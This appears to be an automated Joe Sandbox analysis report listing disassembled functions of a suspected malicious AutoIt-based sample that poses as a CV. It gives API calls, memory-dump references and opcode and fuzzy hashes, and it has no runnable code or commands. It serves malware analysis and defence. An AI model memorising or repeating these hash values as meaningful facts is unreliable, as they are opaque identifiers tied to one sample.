                                                                                        • Instruction Fuzzy Hash: 90E04FB1900204EFDB015FB0C94862E7BA8EB4C350F11CC25FD5A9B210CB7598448F44
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003BB2DF
                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 003BB2EB
                                                                                        • CloseHandle.KERNEL32(?), ref: 003BB2F4
                                                                                        • CloseHandle.KERNEL32(?), ref: 003BB2FC
                                                                                          • Part of subcall function 003BAB24: GetProcessHeap.KERNEL32(00000000,?,003BA848), ref: 003BAB2B
                                                                                          • Part of subcall function 003BAB24: HeapFree.KERNEL32(00000000), ref: 003BAB32
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                        • String ID:
                                                                                        • API String ID: 146765662-0
                                                                                        • Opcode ID: 5949fc9453f4adee1395895c6144c050df719a2768dfc2e9d12730585709e7d4
                                                                                        • Instruction ID: 3187f546ffebe7685ba05860e48ab7d4235ba9b4de6dd5b7a7ef6486be64e027
                                                                                        • Opcode Fuzzy Hash: 5949fc9453f4adee1395895c6144c050df719a2768dfc2e9d12730585709e7d4
                                                                                        • Instruction Fuzzy Hash: 09E0EC3A504405BFCB026FE5ED08859FFB6FF883213109231FA2591571CB32A875EB95
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2889604237-0
                                                                                        • Opcode ID: d6b37667f542aacce34637b08ff9f9e1af95e0490f4fae4b1779978426c11d10
                                                                                        • Instruction ID: 6dc1e09dacfc24e86771a6b41ed8f633ae27ebbfe34509d76f9257892a774d57
                                                                                        • Opcode Fuzzy Hash: d6b37667f542aacce34637b08ff9f9e1af95e0490f4fae4b1779978426c11d10
                                                                                        • Instruction Fuzzy Hash: 9FE046B1900200EFDF015FB0C94862E7BA8EB4C350F118829F95EAB220CB7A98448F08
                                                                                        APIs
                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 003BDEAA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContainedObject
                                                                                        • String ID: AutoIt3GUI$Container
                                                                                        • API String ID: 3565006973-3941886329
                                                                                        • Opcode ID: 5cc8e016be22b3ef53e8c0c64ae18c544906ec8a3c753e2deeeb1ecd35872eab
                                                                                        • Instruction ID: e663cb77ac1127e8f041b8a2b5c5a11d38d505091d1b999b7ebb228abaf68fd0
                                                                                        • Opcode Fuzzy Hash: 5cc8e016be22b3ef53e8c0c64ae18c544906ec8a3c753e2deeeb1ecd35872eab
                                                                                        • Instruction Fuzzy Hash: DE913A706006019FDB15DF64C884BAAB7F9BF49718F20846EF94ACFA91EB70E841CB50
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy
                                                                                        • String ID: I/?$I/?
                                                                                        • API String ID: 3048848545-1830153238
                                                                                        • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                                        • Instruction ID: d20bd2dcb90bcffae3ffc9abddbfa3ec27ad65bc18623a45b259a32e6f6ae43b
                                                                                        • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                                        • Instruction Fuzzy Hash: C141B035900616AACF26EF98C441FFEB7B0EF49710F51505EE881EB191DB306E92C7A4
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000), ref: 0039BCDA
                                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 0039BCF3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                        • String ID: @
                                                                                        • API String ID: 2783356886-2766056989
                                                                                        • Opcode ID: 3520c433c7f8212b53285bdb00a5e7f905a52b88d897a1c43839da56aa272fe1
                                                                                        • Instruction ID: 9acb49a90b65f362c318c4df0a597934f11f96c38b568e3cebd0dca395e56851
                                                                                        • Opcode Fuzzy Hash: 3520c433c7f8212b53285bdb00a5e7f905a52b88d897a1c43839da56aa272fe1
                                                                                        • Instruction Fuzzy Hash: 43514672409B44ABE721AF14DC86BAFBBECFF94354F41485EF1C8450A2DB7085A8CB56
                                                                                        APIs
                                                                                          • Part of subcall function 003844ED: __fread_nolock.LIBCMT ref: 0038450B
                                                                                        • _wcscmp.LIBCMT ref: 003CC65D
                                                                                        • _wcscmp.LIBCMT ref: 003CC670
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                        • String ID: FILE
                                                                                        • API String ID: 4029003684-3121273764
                                                                                        • Opcode ID: a3562587ccc1161089d92f2f946f8987e546169c105ded0788539c7c938fc470
                                                                                        • Instruction ID: 347a9f0b0e238f9bf0b301ee0b756879016fa73d68f0b56ebabe1973bfcae262
                                                                                        • Opcode Fuzzy Hash: a3562587ccc1161089d92f2f946f8987e546169c105ded0788539c7c938fc470
                                                                                        • Instruction Fuzzy Hash: 1D41C372A0020ABBDF22AAA4DC42FEF77B9EF49714F011469F605EB181D6759E04CB61
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 003EA85A
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003EA86F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: '
                                                                                        • API String ID: 3850602802-1997036262
                                                                                        • Opcode ID: 8d37d6764b22b6d09ebf4953fde084e38f87361de7eb3e54c23d463a75cedbd9
                                                                                        • Instruction ID: 133af5f812ac4b0a0268ebd71f3e69a5480d89929f62636f82a8299463db5cf9
                                                                                        • Opcode Fuzzy Hash: 8d37d6764b22b6d09ebf4953fde084e38f87361de7eb3e54c23d463a75cedbd9
                                                                                        • Instruction Fuzzy Hash: 96411974E017599FDB15CFA9C880BDA7BB9FB09300F11016AE909EB391D770A941CFA1
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 003E980E
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003E984A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$DestroyMove
                                                                                        • String ID: static
                                                                                        • API String ID: 2139405536-2160076837
                                                                                        • Opcode ID: 82989534fe0b44122dad0de3c02492c31af89d0cded0bd83a10df36f1d4bdfd4
                                                                                        • Instruction ID: d4a3f8ef2be0f6397e16940831120d90242c80663d77e8832dd1249500deb9fe
                                                                                        • Opcode Fuzzy Hash: 82989534fe0b44122dad0de3c02492c31af89d0cded0bd83a10df36f1d4bdfd4
                                                                                        • Instruction Fuzzy Hash: 0D31AF71110654AEEB119F75CC80BFB73A9FF59760F01861AF8A9D71A0CA31AC85CB64
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003C51C6
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003C5201
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        • Opcode ID: 0951d72af73e36e12a59672fdc29df0cce6218199fb8be252c5bc015a312625e
                                                                                        • Instruction ID: 311a90677bc83adf612831e5cfd989479b018d5415643f009931fd7bd375ffcb
                                                                                        • Opcode Fuzzy Hash: 0951d72af73e36e12a59672fdc29df0cce6218199fb8be252c5bc015a312625e
                                                                                        • Instruction Fuzzy Hash: D431A5316007049BEB26DF99D845FAEBBF8EF45350F15482DE985E61A0D770BD84DB10
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __snwprintf
                                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                        • API String ID: 2391506597-2584243854
                                                                                        • Opcode ID: 01f8d5c6fcee2436a6f334638d4be2eec653f96226bd0f7eafd3fa7b8e4c387d
                                                                                        • Instruction ID: 88005ce8433b0c515682838a24e8446c94c8400ac3aad0709a2064abc54dd33a
                                                                                        • Opcode Fuzzy Hash: 01f8d5c6fcee2436a6f334638d4be2eec653f96226bd0f7eafd3fa7b8e4c387d
                                                                                        • Instruction Fuzzy Hash: C4219171600218AFCF12EFA4D882FEE77B4AF49700F10049AF515AF281DB74EA45CBA5
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003E945C
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003E9467
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: Combobox
                                                                                        • API String ID: 3850602802-2096851135
                                                                                        • Opcode ID: 860c62f736d480f7cd2f9ad01e8f8a7fa5abb9ac595eda0ac5957f98477f1e33
                                                                                        • Instruction ID: 43aff484c257234f6ecb38e4c235572315796bd37be152f41ad975484d8f0f94
                                                                                        • Opcode Fuzzy Hash: 860c62f736d480f7cd2f9ad01e8f8a7fa5abb9ac595eda0ac5957f98477f1e33
                                                                                        • Instruction Fuzzy Hash: 2F1186713102586FEF12DF56DC81FBB376EEB483A4F114226F915972E0D6719C528B60
                                                                                        APIs
                                                                                          • Part of subcall function 0039B34E: GetWindowLongW.USER32(?,000000EB), ref: 0039B35F
                                                                                        • GetActiveWindow.USER32 ref: 003EDA7B
                                                                                        • EnumChildWindows.USER32(?,003ED75F,00000000), ref: 003EDAF5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ActiveChildEnumLongWindows
                                                                                        • String ID: T1=
                                                                                        • API String ID: 3814560230-180425949
                                                                                        • Opcode ID: f7b2b84b0cb24b37c97561b4f315fbc377a51697b3a662131c4fcc766e472c31
                                                                                        • Instruction ID: 43f7e2035a55542d86f360c8d7f60f306ab9443df9b9e240139d18d537135d76
                                                                                        • Opcode Fuzzy Hash: f7b2b84b0cb24b37c97561b4f315fbc377a51697b3a662131c4fcc766e472c31
                                                                                        • Instruction Fuzzy Hash: 18214F39604251DFCB15DF29E850AA6B3F5EF5A320F160729F969873E0D730A840CF64
                                                                                        APIs
                                                                                          • Part of subcall function 0039D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0039D1BA
                                                                                          • Part of subcall function 0039D17C: GetStockObject.GDI32(00000011), ref: 0039D1CE
                                                                                          • Part of subcall function 0039D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0039D1D8
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 003E9968
                                                                                        • GetSysColor.USER32(00000012), ref: 003E9982
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                        • String ID: static
                                                                                        • API String ID: 1983116058-2160076837
                                                                                        • Opcode ID: fd699ada43018a38bd899cd865885abf53f58abccd5ac818aca42084334b5658
                                                                                        • Instruction ID: 9f7e315340c5ac67b2b2876a83fcb0772c13600019ee1e4746b6d9fb562ce9c2
                                                                                        • Opcode Fuzzy Hash: fd699ada43018a38bd899cd865885abf53f58abccd5ac818aca42084334b5658
                                                                                        • Instruction Fuzzy Hash: EE116772520219AFDF05DFB8CC45EEA7BA8FB08304F014A29F955E3291E735E850DB60
                                                                                        APIs
                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 003E9699
                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003E96A8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                        • String ID: edit
                                                                                        • API String ID: 2978978980-2167791130
                                                                                        • Opcode ID: 933491c495c1113ab3da2b54133298dc88e9defe5ab203447edece8694018638
                                                                                        • Instruction ID: ba722e097a53795bbc29bfa425bd4e053c7d670321e4f1004d0f3da5b34dfa79
                                                                                        • Opcode Fuzzy Hash: 933491c495c1113ab3da2b54133298dc88e9defe5ab203447edece8694018638
                                                                                        • Instruction Fuzzy Hash: E2118871500158AAEF129FA59C40BEB3B6AEB093B8F110726F924961E0C635AC909764
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003C52D5
                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003C52F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        • Opcode ID: e2ef5ce1dd228245225bb88410d60b8643149311fa3f38648a8152d8575a877c
                                                                                        • Instruction ID: e833ddbd0b099c73f10d81e75e4661dce7b9091402c6c11014ddc8c35fc7e38d
                                                                                        • Opcode Fuzzy Hash: e2ef5ce1dd228245225bb88410d60b8643149311fa3f38648a8152d8575a877c
                                                                                        • Instruction Fuzzy Hash: A811E67BA01654ABDB12DB98DD04F9D77F8AB46750F060029E982E71A0D7B0FD84C790
                                                                                        APIs
                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003D4DF5
                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003D4E1E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$OpenOption
                                                                                        • String ID: <local>
                                                                                        • API String ID: 942729171-4266983199
                                                                                        • Opcode ID: 90b71e07d72a777309830f81b2931cfcf63560fc6e4a1b40dd0603a1a14d18cf
                                                                                        • Instruction ID: 9844eb77f7be45936f514ef86525e699b62f44ea563615b50a7486a5b83d5376
                                                                                        • Opcode Fuzzy Hash: 90b71e07d72a777309830f81b2931cfcf63560fc6e4a1b40dd0603a1a14d18cf
                                                                                        • Instruction Fuzzy Hash: F611AC72501221BBDB268FA1DC89EFBFBADFF06755F10822BF505A6640D3705984C6E0
                                                                                        APIs
                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003B37A7
                                                                                        • ___raise_securityfailure.LIBCMT ref: 003B388E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                        • String ID: (D
                                                                                        • API String ID: 3761405300-218117518
                                                                                        • Opcode ID: 81c9b5a72ab42584ce04eb3d8f108c4145c5975a95fd339663d700902cbd517b
                                                                                        • Instruction ID: 6b022cd175ac55fec130bd5b275c4d1505c1bd8f98e222877f8d3edfad315e30
                                                                                        • Opcode Fuzzy Hash: 81c9b5a72ab42584ce04eb3d8f108c4145c5975a95fd339663d700902cbd517b
                                                                                        • Instruction Fuzzy Hash: 472112F9510204DAE700DF55E9866407BB4BB4A314F20583AEB088B7A1E7B469B5CB4D
                                                                                        APIs
                                                                                        • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 003DA84E
                                                                                        • htons.WSOCK32(00000000,?,00000000), ref: 003DA88B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
